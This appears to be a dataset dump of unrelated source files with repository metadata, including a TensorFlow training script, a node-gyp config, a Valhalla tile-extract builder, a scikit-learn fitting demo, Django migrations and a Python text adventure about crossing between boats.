predict=tf.cast(tf.equal(tf.cast(model>0.5,tf.float32),tf.slice(y,[0,1],[-1,1])),tf.float32)
correctPrediction=tf.reduce_sum(tf.cast(predict,tf.int32))
accuracy=tf.reduce_mean(tf.cast(predict,tf.float32))
#begin train
with tf.Session() as sess:
print("init variables")
init=tf.global_variables_initializer()
#sess=tf.Session()
sess.run(init)
prevtestAcc=0.0
stableCounter=0#count check times for stable status
maxCheck=2#def max check time for stable status
#begin train model
print("running multi-layer perceptrons")
t1 = time.time()
for i in range(iterationNum):
batchX,batchY=trainData.nextXY(batchSize)
if i % 50 == 1:
print("step %d" % (i))
acctest=accuracy.eval(feed_dict={x:xt,y:yt,keep_prob:1.0})
print("test accuracy=%2.2f"%(acctest))
#acctrain = accuracy.eval(feed_dict={x: batchX, y:batchY,keep_prob:1.0})
#print("train accuracy=%2.2f" % (acctrain))
if abs(prevtestAcc-acctest)<0.0001:
stableCounter = stableCounter + 1
if stableCounter>maxCheck:
break
prevtestAcc=acctest
sess.run(train_step, feed_dict={x: batchX, y: batchY, keep_prob: 0.5})
t2=time.time()
print("finished in",t2-t1,"s")
correctNum=sess.run(correctPrediction,feed_dict={x:xt,y:yt,keep_prob:1.0})
print("accuracy is as below with learning rate={} and batchSize={}:".format(learnRate,batchSize))
print(correctNum,validData.dataSize,correctNum/validData.dataSize)
#predict result
#an example
pm=sess.run(model,feed_dict={x:xt,keep_prob:1.0})
pt=sess.run(y,feed_dict={y:yt})
for i in range(len(pt)):
print(pm[i],pt[i])
#label of the testData
if testData is None:
return
result=sess.run(model,feed_dict={x:testData.dataSet,keep_prob:1.0})
writePreiction(result,testData.IDset)
#write predicton result
def writePreiction(result,IDset):
predict=[]
print(result)
#print(len(result),len(IDset))
for i in range(len(result)):
predict.append([IDset[i],"%2.2f"%result[i][0]])
#print(predict[i])
f=open('../data/submission.csv','w',newline='')
writer = csv.writer(f)
header=['id','predict']
writer.writerow(header)
writer.writerows(predict)
#test
def prePareData():
# testdata
testData = UserTestData('../data/test.csv')
#model train data
mydata=UserTrainData('../data/train.csv')
#preprocessing
StrEncode(getCounters(mydata),mydata.dataSet)
StrEncode(getCounters(testData),testData.dataSet)
rmL=loadRlist()
mydata.dataSet=rmCols(mydata.dataSet,rmL)
testData.dataSet=rmCols(testData.dataSet,rmL)
fillColsMode(mydata.dataSet)
fillColsMode(testData.dataSet)
#split 0.8 0.2 for train model and 0.2 for valid correctness
ratio=0.8
n=int(len(mydata.dataSet)*ratio)
tdata=mydata.dataSet[n:]
mydata.dataSize=n
mydata.dataSet=mydata.dataSet[0:n]
traindata=mydata
validdata=UserTrainData(tdata)
traindata.initXY2()
validdata.initXY2()
#begin
print('data prepared:Selected Attribute(%d), train Model(%d),validData(%d)'%
(len(traindata.X[0]),len(traindata.X),len(validdata.X))
)
return (traindata, validdata, testData)
if __name__=="__main__":
traindata, validdata, testData=prePareData()
multi_perceptron(traindata, validdata, testData)
| [
"[email protected]"
]
| |
3940101563b49cd1e017efdcfc68a4f8c102c21f | 1c38baab22de9208565613ea52a468b08111295e | /node_modules/ac-koa/node_modules/ac-node/node_modules/mongodb/node_modules/kerberos/build/config.gypi | efc738040e02514e98dd5eea7ae9a38acbeca620 | [
"Apache-2.0"
]
| permissive | mrschaff/hipchat-translate | 62d4665dd8ffb7249f632e6fa56ea5a0b04014e1 | 0f56a22c4d072fc09317cda30b25de64d5eac997 | refs/heads/master | 2021-01-10T06:48:54.198569 | 2016-04-04T20:45:02 | 2016-04-04T20:45:02 | 54,481,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,753 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 48,
"host_arch": "x64",
"icu_data_file": "icudt55l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt55l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "55",
"node_install_npm": "true",
"node_prefix": "/usr",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/bin/python",
"target_arch": "x64",
"uv_library": "static_library",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "false",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/home/vagrant/project/node_modules/ac-koa/node_modules/ac-node/node_modules/mongodb/node_modules/kerberos/.node-gyp/0.12.12",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"sign_git_tag": "",
"user_agent": "npm/2.14.9 node/v0.12.12 linux x64",
"always_auth": "",
"bin_links": "true",
"key": "",
"description": "true",
"fetch_retries": "2",
"heading": "npm",
"if_present": "",
"init_version": "1.0.0",
"user": "1000",
"force": "",
"cache_min": "10",
"init_license": "ISC",
"editor": "vi",
"rollback": "true",
"tag_version_prefix": "v",
"cache_max": "Infinity",
"userconfig": "/root/.npmrc",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/tmp",
"depth": "Infinity",
"save_dev": "",
"usage": "",
"cafile": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr",
"browser": "",
"cache_lock_wait": "10000",
"registry": "https://registry.npmjs.org/",
"save_optional": "",
"scope": "",
"searchopts": "",
"versions": "",
"cache": "/root/.npm",
"ignore_scripts": "",
"searchsort": "name",
"version": "",
"local_address": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "0022",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"ca": "",
"cert": "",
"global": "",
"link": "",
"access": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "",
"node_version": "0.12.12",
"tag": "latest",
"git_tag_version": "true",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"save_exact": "",
"strict_ssl": "true",
"dev": "",
"globalconfig": "/usr/etc/npmrc",
"init_module": "/root/.npm-init.js",
"parseable": "",
"globalignorefile": "/usr/etc/npmignore",
"cache_lock_retries": "10",
"save_prefix": "^",
"group": "1000",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"json": "",
"spin": "true"
}
}
| [
"[email protected]"
]
| |
3ca0f0f9c4cc6b4dfa80991dd9bbeb1c6b3a23a9 | bb5ddd4543e790a78764af3b775ee23a1842cde2 | /scripts/valhalla_build_extract | 259634bf2522a16d08dd45b38f14db5bb6c57ed0 | [
"MIT"
]
| permissive | molind/valhalla | ee8fcd88eb2b546af8381ab015e25a06063c0847 | 52f869ea2cc192ab31e9d5e75170cab29694059c | refs/heads/master | 2022-09-20T20:38:17.346015 | 2022-09-14T17:48:39 | 2022-09-14T17:48:39 | 84,201,422 | 0 | 0 | null | 2017-03-07T13:20:31 | 2017-03-07T13:20:31 | null | UTF-8 | Python | false | false | 7,488 | #!/usr/bin/env python3
import argparse
import ctypes
from io import BytesIO
import json
import logging
import os
from pathlib import Path
import struct
import sys
import tarfile
from tarfile import BLOCKSIZE
from time import time
from typing import List, Tuple
# "<" prefix means little-endian and no alignment
# order is important! if uint64_t is not first, c++ will use padding bytes to unpack
INDEX_BIN_FORMAT = '<QLL'
INDEX_BIN_SIZE = struct.calcsize(INDEX_BIN_FORMAT)
INDEX_FILE = "index.bin"
# skip the first 40 bytes of the tile header
GRAPHTILE_SKIP_BYTES = struct.calcsize('<Q2f16cQ')
TRAFFIC_HEADER_SIZE = struct.calcsize('<2Q4I')
TRAFFIC_SPEED_SIZE = struct.calcsize('<Q')
class TileHeader(ctypes.Structure):
"""
Resembles the uint64_t bit field at bytes 40 - 48 of the
graphtileheader to get the directededgecount_.
"""
_fields_ = [
("nodecount_", ctypes.c_ulonglong, 21),
("directededgecount_", ctypes.c_ulonglong, 21),
("predictedspeeds_count_", ctypes.c_ulonglong, 21),
("spare1_", ctypes.c_ulonglong, 1),
]
description = "Builds a tar extract from the tiles in mjolnir.tile_dir to the path specified in mjolnir.tile_extract."
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-c", "--config", help="Absolute or relative path to the Valhalla config JSON.", type=Path
)
parser.add_argument(
"-i",
"--inline-config",
help="Inline JSON config, will override --config JSON if present",
type=str,
default='{}',
)
parser.add_argument(
"-t", "--with-traffic", help="Flag to add a traffic.tar skeleton", action="store_true", default=False
)
parser.add_argument(
"-v",
"--verbosity",
help="Accumulative verbosity flags; -v: INFO, -vv: DEBUG",
action='count',
default=0,
)
# set up the logger basics
LOGGER = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)5s: %(message)s"))
LOGGER.addHandler(handler)
def get_tile_count(in_path: Path) -> int:
"""Iterates over the full tree and returns the count of all tiles it found."""
count = 0
for _, _, files in os.walk(in_path):
count += len(list(filter(lambda f: f.endswith('.gph'), files)))
return count
def get_tile_id(path: str) -> int:
"""Turns a tile path into a numeric GraphId"""
level, idx = path[:-4].split('/', 1)
return int(level) | (int(idx.replace('/', '')) << 3)
def get_tar_info(name: str, size: int) -> tarfile.TarInfo:
"""Creates and returns a tarinfo object"""
tarinfo = tarfile.TarInfo(name)
tarinfo.size = size
tarinfo.mtime = int(time())
tarinfo.type = tarfile.REGTYPE
return tarinfo
def write_index_to_tar(tar_fp_: Path):
"""Loop through all tiles and write the correct index.bin file to the tar"""
# get the offset and size from the tarred tile members
index: List[Tuple[int, int, int]] = list()
with tarfile.open(tar_fp_, 'r|') as tar:
for member in tar.getmembers():
if member.name.endswith('.gph'):
LOGGER.debug(
f"Tile {member.name} with offset: {member.offset_data}, size: {member.size}"
)
index.append((member.offset_data, get_tile_id(member.name), member.size))
# write back the actual index info
with open(tar_fp_, 'r+b') as tar:
# jump to the data block, index.bin is the first file
tar.seek(BLOCKSIZE)
for entry in index:
tar.write(struct.pack(INDEX_BIN_FORMAT, *entry))
def create_extracts(config_: dict, do_traffic: bool):
"""Actually creates the tar ball. Break out of main function for testability."""
tiles_fp: Path = Path(config_["mjolnir"].get("tile_dir", '/dev/null'))
extract_fp: Path = Path(
config_["mjolnir"].get("tile_extract") or tiles_fp.parent.joinpath('tiles.tar')
)
traffic_fp: Path = Path(
config_["mjolnir"].get("traffic_extract") or tiles_fp.parent.joinpath('traffic.tar')
)
if not tiles_fp.is_dir():
LOGGER.critical(
f"Directory 'mjolnir.tile_dir': {tiles_fp.resolve()} was not found on the filesystem."
)
sys.exit(1)
tiles_count = get_tile_count(tiles_fp)
if not tiles_count:
LOGGER.critical(f"Directory {tiles_fp} does not contain any usable graph tiles.")
sys.exit(1)
# write the in-memory index file
index_size = INDEX_BIN_SIZE * tiles_count
index_fd = BytesIO(b'0' * index_size)
index_fd.seek(0)
# first add the index file, then the sorted tiles to the tarfile
# TODO: come up with a smarter strategy to cluster the tiles in the tar
with tarfile.open(extract_fp, 'w') as tar:
tar.addfile(get_tar_info(INDEX_FILE, index_size), index_fd)
for t in sorted(tiles_fp.rglob('*.gph')):
tar.add(str(t.resolve()), arcname=str(t.relative_to(tiles_fp)))
write_index_to_tar(extract_fp)
LOGGER.info(f"Finished tarring {tiles_count} tiles to {extract_fp}")
# exit if no traffic extract wanted
if not do_traffic:
index_fd.close()
sys.exit(0)
LOGGER.info("Start creating traffic extract...")
# we already have the right size of the index file, simply reset it
index_fd.seek(0)
with tarfile.open(extract_fp) as tar_in, tarfile.open(traffic_fp, 'w') as tar_traffic:
# this will let us do seeks
in_fileobj = tar_in.fileobj
# add the index file as first data
tar_traffic.addfile(get_tar_info(INDEX_FILE, index_size), index_fd)
index_fd.close()
# loop over all routing tiles and create fixed-size traffic tiles
# based on the directed edge count
for tile_in in tar_in.getmembers():
if not tile_in.name.endswith('.gph'):
continue
# jump to the data's offset and skip the uninteresting bytes
in_fileobj.seek(tile_in.offset_data + GRAPHTILE_SKIP_BYTES)
# read the appropriate size of bytes from the tar into the TileHeader struct
tile_header = TileHeader()
b = BytesIO(in_fileobj.read(ctypes.sizeof(TileHeader)))
b.readinto(tile_header)
b.close()
# create the traffic tile
traffic_size = TRAFFIC_HEADER_SIZE + TRAFFIC_SPEED_SIZE * tile_header.directededgecount_
tar_traffic.addfile(get_tar_info(tile_in.name, traffic_size), BytesIO(b'\0' * traffic_size))
LOGGER.debug(f"Tile {tile_in.name} has {tile_header.directededgecount_} directed edges")
write_index_to_tar(traffic_fp)
LOGGER.info(f"Finished creating the traffic extract at {traffic_fp}")
if __name__ == '__main__':
args = parser.parse_args()
if not args.config and not args.inline_config:
LOGGER.critical("No valid config file or inline config used.")
sys.exit(1)
config = dict()
try:
with open(args.config) as f:
config = json.load(f)
except TypeError:
LOGGER.warning("Only inline-config will be used.")
# override with inline-config
config.update(**json.loads(args.inline_config))
# set the right logger level
if args.verbosity == 0:
LOGGER.setLevel(logging.CRITICAL)
elif args.verbosity == 1:
LOGGER.setLevel(logging.INFO)
elif args.verbosity >= 2:
LOGGER.setLevel(logging.DEBUG)
create_extracts(config, args.with_traffic)
| [
"[email protected]"
]
| ||
e340f9127368c9c920a416442cc21904b4e04a23 | 598db6374c25eba964b4c3cc7fc03b3dfdfad92e | /fitting.py | 2ed3493a200dc19c0d37771ebc2487ff27907179 | [
"MIT"
]
| permissive | yyuuliang/toolbox | 3e8a83464495ceab05c4bc1821b65a6cddf00205 | 9da907fd1a73c3694e5b4fcfb052fc3d5fb1fc42 | refs/heads/master | 2020-06-28T04:29:20.026980 | 2019-08-08T01:09:56 | 2019-08-08T01:09:56 | 200,143,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py |
import numpy as np
from matplotlib import pyplot as plt
from sklearn import linear_model, datasets
n_samples = 10
n_outliers = 3
X, y, coef = datasets.make_regression(n_samples=n_samples, n_features=1,
n_informative=1, noise=10,
coef=True, random_state=0)
# Add outlier data
np.random.seed(0)
X[:n_outliers] = 3 + 0.5 * np.random.normal(size=(n_outliers, 1))
y[:n_outliers] = -3 + 10 * np.random.normal(size=n_outliers)
# Fit line using all data
lr = linear_model.LinearRegression()
lr.fit(X, y)
# Robustly fit linear model with RANSAC algorithm
ransac = linear_model.RANSACRegressor()
ransac.fit(X, y)
inlier_mask = ransac.inlier_mask_
outlier_mask = np.logical_not(inlier_mask)
# Polyfit using numpy
npcoef = np.polyfit(X.reshape([10,]),y,deg=3)
npcube = np.poly1d(npcoef)
# Predict data of estimated models
line_X = np.arange(X.min(), X.max())[:, np.newaxis]
line_y = lr.predict(line_X)
line_y_ransac = ransac.predict(line_X)
line_y_np = npcube(line_X)
# Compare estimated coefficients
print("Estimated coefficients (true, linear regression, RANSAC):")
print(coef, lr.coef_, ransac.estimator_.coef_)
lw = 2
plt.scatter(X[inlier_mask], y[inlier_mask], color='yellowgreen', marker='.',
label='Inliers')
plt.scatter(X[outlier_mask], y[outlier_mask], color='gold', marker='.',
label='Outliers')
plt.plot(line_X, line_y_np, color='navy', linewidth=lw, label='Linear regressor')
plt.plot(line_X, line_y_ransac, color='cornflowerblue', linewidth=lw,
label='RANSAC regressor')
plt.legend(loc='lower right')
plt.xlabel("Input")
plt.ylabel("Response")
plt.show()
| [
"[email protected]"
]
| |
dd458bd298118cd4b80b586051dd3b742d78573a | 9f2eb69625bd0204f2e7d39b56592c92afe5e07b | /photos/migrations/0001_initial.py | 2c41e42421a2c744469a9ed886ba1d026feb09e9 | []
| no_license | Cris123m/machtecBeta | f8b426a0f996b189a8595ef179639facf77c0056 | 7c01653d5876c34974e0e8b6beb8e93da86604c8 | refs/heads/master | 2020-09-06T23:11:45.904167 | 2020-03-09T00:22:45 | 2020-03-09T00:22:45 | 220,584,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | # Generated by Django 2.2.6 on 2019-11-08 23:32
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Título')),
('content', ckeditor.fields.RichTextField(verbose_name='Contenido')),
('photo', models.ImageField(blank=True, null=True, upload_to='carousel', verbose_name='Foto')),
('order', models.SmallIntegerField(default=0, verbose_name='Orden')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Fecha de creación')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Fecha de edición')),
],
options={
'verbose_name': 'foto',
'verbose_name_plural': 'fotos',
'ordering': ['order', 'title'],
},
),
]
| [
"[email protected]"
]
| |
5694f828530a430b4aca5569f67e50d0baf88575 | aff694b019806db8f8cd66fd205f9049351bb10c | /bin/wheel | e54d9f83eb92ea97085a22f82f854bd08e745464 | []
| no_license | mikilabarda/my-first-blog | 3885d08f87e9c3f05da7000b9e60d29f3895efd3 | 7e1476fa75e6db95bfe8685ad43a233777166071 | refs/heads/master | 2021-05-30T19:25:38.022284 | 2016-03-20T05:31:16 | 2016-03-20T05:31:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | #!/Users/Miki/Desktop/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
]
| ||
e3399daf37f287b2f7c0b62e55f30e6611bf5d97 | 0f89043a9e7caac53bc76cd359d704d5cfaef3db | /main/migrations/0044_remove_tag_resources.py | eaef56cf0970beb2e07945c8e6a10d9b814acaf4 | []
| no_license | sirodoht/knowhub | f704d987f6c800717c2dba7b811d05b0d85801fd | 4c242a9f1bc14a11fbf799119b19d79c4201ba2d | refs/heads/master | 2022-03-05T15:28:55.539951 | 2019-11-18T18:33:42 | 2019-11-18T18:33:42 | 134,064,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | # Generated by Django 2.1 on 2018-08-27 13:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("main", "0043_auto_20180826_0050")]
operations = [migrations.RemoveField(model_name="tag", name="resources")]
| [
"[email protected]"
]
| |
49314760024407a296f238dd33047174c356b49e | 30447f52275d988d57ab224ae5e70919ce4f7cad | /game.py | 89729dc928baef50512b9ee824f38145af01f68c | [
"MIT"
]
| permissive | EMCain/boats-game | d452698f8293e2fb4560f25e6c1193e41be0d751 | 98d7f68ab53d0fdb7c5f8ea38b1ff76f6f701ff9 | refs/heads/master | 2021-01-10T19:31:59.606871 | 2015-07-23T21:33:53 | 2015-07-23T21:33:53 | 39,591,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,709 | py | # This is a text based game that involves moving between interconnected boats.
# It's basically a trading sequence game; you're talking to characters to determine what they want, so you can help them and they can give you something you need to continue. It's my first Python program. I hope you like it!
# This game was written in 2015 by Emily Cain (github.com/EMCain; emcain.net)
# Protected by Attribution-ShareAlike 4.0 International, see https://creativecommons.org/licenses/by-sa/4.0/ for details.
# Attribution - You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
# ShareAlike - If you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original.
# No additional restrictions - You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.
import random
# a function to validate input when you need an integer. This prevents type input errors from crashing the program.
def validate_int(input):
need_input = True
while need_input:
try:
output = int(input)
need_input = False
except ValueError:
print "please enter a valid number with no decimal points"
input = raw_input("> ")
continue
return output
# A similar function to validate strings
def validate_str(input):
need_input = True
while need_input:
try:
output = str(input)
need_input = False
except ValueError:
print "please enter a valid string."
input = raw_input("> ")
continue
return output
#defines the Boat object which is the basis for location in this game
class Boat(object):
#inputs are place (the boat's position), cons (a dictionary of connecting boat numbers : the conditions to move to those boats) style (the boat's type, for flavor), and character (the person who is on the boat; None by default.)
def __init__(self, place, cons, style, character = None):
self.connections = {}
for key in cons: # transfer the key-value pairs in the dictionary "cons" to the internal (self) dictionary "connections"
self.connections[key] = cons[key]
self.position = validate_int(place) # self's position is the input int called place
self.kind = validate_str(style) # self's kind is the input string called style
self.person = character
def get_person(self): # used when a string describing the person is needed. Npc has a custom __str__method so you can use it this way.
if self.person is not None:
return self.person
else:
self.blank_things = ["dust bunny", "mouse", "pile of old boxes"] # the idea is that if no one is on the boat you see some random junk.
return random.choice(self.blank_things)
# the Player class handles most of your actions in the game. The Map class handles most of the background stuff that needs to happen.
class Player(object):
def __init__(self):
self.the_map = Map()
self.location = 0 # your current position; the number refers to a boat.
def see_connected_boats(self):
print "You can move to the following places."
current_boat = self.the_map.boats[self.location] # assign current_boat to the boat object located in the map's boats list in the position of own location
for connection in current_boat.connections:
print connection, ":", self.the_map.boats[connection].kind
def on_boat_actions(self): # this must be run in a loop for the game to work.
self.the_boat = self.the_map.boats[self.location]
raw_input("Continue >> ") # exists simply to slow down the flow of text. Otherwise it gets overwhelming.
print "\n"
print "You are on " + self.the_boat.kind + "."
self.the_person = self.the_boat.get_person() # the person (Npc) who's on the boat
print "You see a", str(self.the_person) + ".\n" # will show some random junk like 'pile of old boxes' if there's no person
print "What do you want to do?"
print "1. talk to the", self.the_person
print "2. move to a different boat"
action = validate_int(raw_input(" > ")) # ensures input is an integer and asks for new input if it's not
self.input_needed = True
while self.input_needed:
if action == 1:
try:
self.the_boat.person.interact() # starts a conversation with the person
except:
print "That's an odd choice.\n" # this happens if you try to talk to the inanimate object that's displayed if there's no person.
self.input_needed = False
elif action == 2:
self.move_to_boat()
self.input_needed = False
else:
print "please enter 1 or 2, then press ENTER or RETURN"
action = validate_int(raw_input(" > ")) # asks for new input and returns to the top of this while loop
continue
# performs various tests to see if moving is possible, moves if possible, if not tells you why. Tests if the move causes you to win, and if so ends game
def move_to_boat(self):
self.the_boat = self.the_map.boats[self.location] # creates the_boat attribute (if needed) and assigns it the boat you're on
self.see_connected_boats()
print "Where do you want to go?"
move_to = validate_int(raw_input("> "))
if move_to in self.the_boat.connections: # tests if the requested boat is connected to your current one
# gets the MoveCondition object associated with your current boat and the one you want to move to
self.the_condition = self.the_boat.connections[move_to]
# next uses the MoveCondition object to determine if you have done the in-game task needed to make this move.
if self.the_condition.fulfilled:
self.location = move_to
self.the_boat = self.the_map.boats[self.location]
print "\nYou cross a narrow rope bridge.\n"
if self.location == self.the_map.win_boat: # tests if the most recent move has moved you to the winning boat.
print "Congratulations, you have reached the last boat!\n"
print "~~~~~~~~~~~~~~~~~~~~You win!~~~~~~~~~~~~~~~~~~~~\n"
print "< ('o'<) ( '-' ) (>^o^)> v( ^.' )v < (' .' )> < ('.'<) ( '.^ ) (>^.^)> v( 0.0 )v < (' .' )>\n" # does a little dance
exit(1)
else:
print "You can't move to this boat yet, because", str(self.the_condition.success_no) # if a MoveCondition prevents you from moving to this boat, this happens to explain why.
else:
print "Sorry, you cannot move to Boat Number", move_to, "because it is not connected to this boat."
# MoveCondition objects are the basis of this game's logic system. They determine whether you can take actions or not.
# If there's no restriction on an action, use the default MoveCondition object with no parameters, which I have called below as always_yes.
# success_question is a question you're trying to answer with this MoveCondition.
# success_no describes what happens if the answer is no; success_yes describes what happens if the answer is yes.
# All 3 parameters are strings and only matter for story purposes; they don't affect how the object functions.
class MoveCondition(object):
def __init__(self, success_question = None, success_no = None, success_yes = None):
self.success_question = ""
self.success_no = ""
self.success_yes = ""
if success_question is None and success_no is None and success_yes is None: #default object
self.fulfilled = True
else:
self.success_question = validate_str(success_question)
self.success_no = validate_str(success_no)
self.success_yes = validate_str(success_yes)
self.fulfilled = False
# I suppose it would make sense to have variations on this to make it unfulfilled or the opposite of whatever it is currently,
# but I don't use them in this game so I haven't added them.
def make_fulfilled(self):
self.fulfilled = True
def __str__(self):
return self.success_question
#all this does is create move conditions and store them in a list.
# The move conditions will be used in a dictionary where they are paired with connections between boats.
class MoveHandler(object):
conditions = {}
def __init__(self):
# a stand-in move condition that starts out true
always_yes = MoveCondition()
self.conditions["AlwaysYes"] = always_yes
baby_crying = MoveCondition("Is the baby happy?", "the baby's dad is blocking the way, and won't move until she stops crying.", "The baby is happy.")
self.conditions["BabyCrying"] = baby_crying
has_cookie = MoveCondition("Do you have a cookie?", "you don't have a cookie.", "You have a cookie.")
self.conditions["HasCookie"] = has_cookie
knows_joke = MoveCondition("Do you know a joke?", "the bored little boy is sprawled out in front of the bridge.", "You know a great joke!")
self.conditions["KnowsJoke"] = knows_joke
# There's a lot going on here. This is the non-player character class.
# Here are the inputs:
# desc is the description of the person, such as "a teenage girl."
# falsetxt is what the character says before they have gotten what they want. If the person doesn't want you to do anything besides talk to them, this is never used.
# truetxt_first is what the character says the first time you talk to them after getting/doing the thing they want. For characters that don't want anything this is the first thing they say to you.
# truetxt_have_talked is what they say all other times after getting what they want; it's usually shorter and involves thanking you.
# move_cond_obj_trigger is the MoveCondition this character has control over.
# move_cond_obj_needed is the MoveCondition representing what this character wants.
class Npc(object):
def __init__(self, desc, falsetxt, truetxt_first, truetxt_have_talked, move_cond_obj_trigger, move_cond_obj_needed):
self.description = validate_str(desc)
self.false_text = validate_str(falsetxt)
self.true_text_first = validate_str(truetxt_first)
self.true_text_have_talked = validate_str(truetxt_have_talked)
self.move_condition_trigger = move_cond_obj_trigger #this is the move condition that is toggled by giving this person what they need
self.move_condition_needed = move_cond_obj_needed # this is what needs to be true to satisfy this person so they trigger the "trigger" condition above
self.have_talked = False # have you talked to this person before? No.
def __str__(self):
return self.description
def interact(self):
# this will be the dialog system. You talk to them and stuff happens.
if self.move_condition_needed.fulfilled == True:
if self.have_talked:
print "\n", self.true_text_have_talked, "\n" # their need has been fulfilled and they remember you.
else:
print "\n", self.true_text_first, "\n" #they state that their need has been fulfilled and they thank you
self.move_condition_trigger.make_fulfilled() # changes the state of the triggered condition to fulfilled
self.have_talked = True
else:
print "\n", self.false_text, "\n" #they state that their need has not been fulfilled e.g. I'm still hungry
class Map(object):
win_boat = 6
def __init__(self):
self.boats = []
self.handler = MoveHandler()
self.condits = self.handler.conditions
self.people = {} #the key will be the boat they are on and the value will be the Npc object representing that person
#create people, add them to dictionary "people"
teen_girl = Npc("teenage girl",
"The girl says, 'I'm so hungry! Ever since Mom started rearranging our stuff, \nthe boats are a mess and we can't get to the pantry.' \n \n'It sucks, because I had a great joke I wanted to tell you, but now I can't remember it.'",
"She says, 'Ugh, I'm SOOO hungry!' \n\n 'Is that a cookie? Give me that!' \n\n *munch munch* \n\n'Thanks! Now I remember the joke! What's brown and sticky?' \n\n 'A stick!'",
"She says, 'Thanks for the cookie! Did you like my joke?",
self.condits["KnowsJoke"],
self.condits["HasCookie"])
self.people[1] = teen_girl
young_man = Npc("young man holding a baby",
"He is blocking the path to the yacht. \n\nHe says: 'Hold on a minute, my daughter is crying.'", "You give the toy to the baby and she stops crying. \n\nThe young man says, 'Thanks for calming the baby, go take a cookie from the yacht!'",
"The baby looks happy. She's so cute!",
self.condits["AlwaysYes"],
self.condits["BabyCrying"])
self.people[2] = young_man
baker = Npc("baker wearing an apron",
"shouldn't happen",
"She has just baked a tray of cookies. \n\nShe says, 'Here, have a cookie!'",
"She says, 'Enjoy your cookie!'",
self.condits["HasCookie"],
self.condits["AlwaysYes"])
self.people[3] = baker
little_boy = Npc("little boy",
"He is blocking the bridge to the rowboat. \n\n'UGGGH I'M SO BORED' he moans. \n\n'Do you know any jokes?'",
"You tell him the joke you just learned. He laughs and moves out of the way.",
"The little boy is sitting on the edge of the boat. \n\nHe says, 'I'm still bored. Do you know any more jokes?'",
self.condits["AlwaysYes"],
self.condits["KnowsJoke"])
self.people[4] = little_boy
midage_woman = Npc("middle-aged woman",
"shouldn't happen",
"She says, 'Can you help me clean this mess?' \n\nYou spend a few minutes helping her sort through her family's belongings. \n\nYou find a baby toy. 'Go ahead and take that,' she says. 'My kids are much too old for it now.'",
"She says, 'Thanks so much for helping me clean!'",
self.condits["BabyCrying"],
self.condits["AlwaysYes"])
self.people[5] = midage_woman
#connections to each boat and the logical condition needed to move between them.
boat_cons = [{1: self.condits["AlwaysYes"]}, # boat 0 (beach)
{0: self.condits["AlwaysYes"], 2: self.condits["AlwaysYes"]}, # boat 1
{1: self.condits["AlwaysYes"], 3: self.condits["BabyCrying"], 5: self.condits["AlwaysYes"]}, # boat 2
{2:self.condits["BabyCrying"]}, # boat 3
{6: self.condits["KnowsJoke"], 5:self.condits["AlwaysYes"]}, #boat 4
{2: self.condits["AlwaysYes"], 4:self.condits["AlwaysYes"]}, # boat 5
{4: self.condits["KnowsJoke"]}] # boat 6
boat_kinds = ["the beach", "a small fishing boat", "a house boat", "a dilapidated old yacht", "a sailing ship with the sails missing", "the back part of a shipping barge", "a large rowboat"]
for x in range(7):
# if statement testing if there are people on a given boat
if x in self.people:
a_boat = Boat(x, boat_cons[x], boat_kinds[x], self.people[x])
else:
a_boat = Boat(x, boat_cons[x], boat_kinds[x])
self.boats.append(a_boat)
def see_all_boats(self): # a testing function which isn't used, but it's handy so I'll leave it here.
output = "These are the boats: \n \n "
for boat in self.boats:
output += "\n " + str(boat.position)
output += ", " + boat.kind
